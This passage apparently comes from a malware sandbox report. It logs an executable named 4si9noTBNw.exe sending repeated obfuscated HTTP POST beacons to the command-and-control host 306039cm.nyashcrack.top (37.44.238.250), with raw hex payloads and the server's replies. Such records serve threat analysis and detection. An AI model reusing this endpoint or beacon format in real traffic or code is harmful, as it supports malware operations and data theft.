                                                                                              Dec 9, 2024 16:00:47.094175100 CET1040OUTData Raw: 5c 58 5e 54 5a 41 5c 58 5c 5c 56 57 50 50 5b 5e 5f 50 59 5d 56 5c 51 56 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \X^TZA\X\\VWPP[^_PY]V\QVXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P 8.69) <&*(<0Z'^5Z*1 >+*8B?.;Z?:&^#,X
                                                                                              Dec 9, 2024 16:00:48.015729904 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:48.254266024 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:47 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              13192.168.2.44976137.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:48.496217012 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1032
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:00:48.846326113 CET1032OUTData Raw: 5c 5a 5e 53 5f 43 59 5c 5c 5c 56 57 50 59 5b 5d 5f 5a 59 58 56 5c 51 5f 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \Z^S_CY\\\VWPY[]_ZYXV\Q_XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#-"]!9:4]14<03;!Y>&"S4?2W(4E+.#^?:&^#,X 3
                                                                                              Dec 9, 2024 16:00:49.777524948 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:50.010581017 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:48 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              14192.168.2.44976737.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:50.264944077 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:00:50.609761000 CET1040OUTData Raw: 59 5d 5e 50 5a 43 5c 5f 5c 5c 56 57 50 5e 5b 5c 5f 5c 59 5a 56 5c 51 58 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y]^PZC\_\\VWP^[\_\YZV\QXXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#,2"96"&?&*+?40[3;6).W /.<9<B<-8*:&^#,X
                                                                                              Dec 9, 2024 16:00:51.567677975 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:51.802381992 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:50 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              15192.168.2.44977337.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:52.044157982 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:00:52.390973091 CET1040OUTData Raw: 5c 5d 5b 52 5f 45 59 59 5c 5c 56 57 50 58 5b 50 5f 5e 59 5b 56 5b 51 58 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \][R_EYY\\VWPX[P_^Y[V[QXXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#/!._66#+&:(+B8]09*%&#?<9'<**&^#,X '


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              16192.168.2.44977437.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:53.187114000 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1756
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:00:53.531476974 CET1756OUTData Raw: 5c 5a 5b 52 5f 45 5c 5b 5c 5c 56 57 50 5f 5b 5e 5f 5d 59 59 56 5a 51 59 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \Z[R_E\[\\VWP_[^_]YYVZQYXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#;5!:-_ +%4R=' Z'8*%*W4<-?)3+(&^#,X ;
                                                                                              Dec 9, 2024 16:00:54.486439943 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:54.722563982 CET308INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:53 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 152
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 0f 15 24 57 35 40 23 5f 20 28 3f 0c 2c 3d 3d 5d 22 3f 3b 5c 3c 3d 3b 5f 32 1d 09 14 3b 59 22 1e 36 30 35 07 28 22 38 55 3c 21 2c 52 35 35 21 5a 06 1e 26 02 27 04 30 57 39 31 30 5b 3c 31 0f 05 20 2e 2c 03 33 33 37 0e 25 59 33 06 30 2f 33 52 38 55 3a 57 3e 10 23 42 3f 3f 2b 5b 30 2f 2b 53 0e 1f 20 1f 29 0f 3d 57 29 3e 23 54 35 3f 0e 1f 25 2d 2e 51 32 21 3c 50 3c 04 13 55 3f 0d 15 1c 22 2d 30 52 26 3f 3a 00 3e 3f 37 53 32 09 20 5e 22 0f 2f 52 00 31 5c 4d
                                                                                              Data Ascii: $W5@#_ (?,==]"?;\<=;_2;Y"605("8U<!,R55!Z&'0W910[<1 .,337%Y30/3R8U:W>#B??+[0/+S )=W)>#T5?%-.Q2!<P<U?"-0R&?:>?7S2 ^"/R1\M


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              17192.168.2.44977637.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:53.319574118 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:00:53.672122002 CET1040OUTData Raw: 59 5d 5b 53 5a 40 59 5b 5c 5c 56 57 50 5a 5b 58 5f 5d 59 59 56 5b 51 5c 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y][SZ@Y[\\VWPZ[X_]YYV[Q\XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P ,2Z".75;%:??4$X$;>>.7<*P<;<[ (*&^#,X /
                                                                                              Dec 9, 2024 16:00:54.591447115 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:54.826522112 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:53 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              18192.168.2.44978137.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:55.074157000 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:00:55.422173977 CET1040OUTData Raw: 5c 59 5b 51 5f 40 59 5a 5c 5c 56 57 50 50 5b 5a 5f 5c 59 5f 56 5d 51 5c 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \Y[Q_@YZ\\VWPP[Z_\Y_V]Q\XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P ,2!!\=45(Z1_7<4&8Z*C2Q"/"U+9(B<0<:&^#,X
                                                                                              Dec 9, 2024 16:00:56.392175913 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:56.626420021 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:55 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              19192.168.2.44978737.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:56.949455976 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:00:57.297116041 CET1040OUTData Raw: 59 5d 5e 50 5a 43 59 5e 5c 5c 56 57 50 51 5b 5e 5f 51 59 59 56 58 51 5f 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y]^PZCY^\\VWPQ[^_QYYVXQ_XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P A;25*#$29,W('''8!>&."<-<7<[3(*&^#,X
                                                                                              Dec 9, 2024 16:00:58.219134092 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:58.454638958 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:57 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              20192.168.2.44979337.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:58.748187065 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:00:59.094018936 CET1040OUTData Raw: 59 58 5b 53 5a 40 5c 59 5c 5c 56 57 50 5f 5b 59 5f 50 59 55 56 53 51 5d 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: YX[SZ@\Y\\VWP_[Y_PYUVSQ]XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P /T*^!!46;%9W<?'^>=&%",5+?0+*&^#,X ;


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              21192.168.2.44979437.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:59.870028019 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1756
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:01:00.219016075 CET1756OUTData Raw: 59 55 5e 54 5a 40 5c 59 5c 5c 56 57 50 58 5b 51 5f 5b 59 5f 56 59 51 5b 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: YU^TZ@\Y\\VWPX[Q_[Y_VYQ[XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P D/2*Z5:-72)(?$Y';)[=&17.V+90B?/]?&^#,X '
                                                                                              Dec 9, 2024 16:01:01.136001110 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:01.246844053 CET717INHTTP/1.1 504 Gateway Time-out
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:00 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 562
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              22192.168.2.44979637.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:01:00.102823019 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:01:00.453352928 CET1040OUTData Raw: 5c 58 5e 5f 5a 41 5c 5e 5c 5c 56 57 50 5f 5b 5a 5f 5f 59 5c 56 53 51 57 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \X^_ZA\^\\VWP_[Z__Y\VSQWXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#8)"6# _%=$(0=)7<6W+9+#^?*&^#,X ;
                                                                                              Dec 9, 2024 16:01:01.373186111 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:01.391387939 CET717INHTTP/1.1 504 Gateway Time-out
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:00 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 562
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              23192.168.2.44993137.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:01.662130117 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:02:02.015983105 CET1040OUTData Raw: 59 55 5e 53 5a 41 59 52 5c 5c 56 57 50 58 5b 5a 5f 5d 59 5f 56 52 51 5c 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: YU^SZAYR\\VWPX[Z_]Y_VRQ\XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P @/"%5*"754[%$T+B4\3(=X(59 /((((&^#,X '
                                                                                              Dec 9, 2024 16:02:02.939073086 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:03.182363987 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:02 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              24192.168.2.44993737.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:03.433032036 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
